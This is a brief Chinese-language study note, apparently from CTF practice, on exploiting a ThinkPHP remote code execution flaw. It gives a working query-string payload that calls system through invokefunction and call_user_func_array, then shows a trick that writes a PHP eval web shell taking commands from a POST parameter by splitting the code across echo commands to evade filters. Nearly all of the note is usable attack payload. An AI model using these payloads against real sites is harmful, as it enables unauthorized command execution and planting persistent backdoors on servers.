原理
Luminous~大佬源码研究
在用大佬的poc对比官方的poc有一个细节
poc里面的thinkphp
要用\
分割成think\php
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id # 命令执行
技巧
real题目我认为getflag是没意义的,幸运的是能从中学到一些技巧
paste命令
echo "<?php @eval(">>f.php|echo "_POST['cmd']); ?>">>u.php|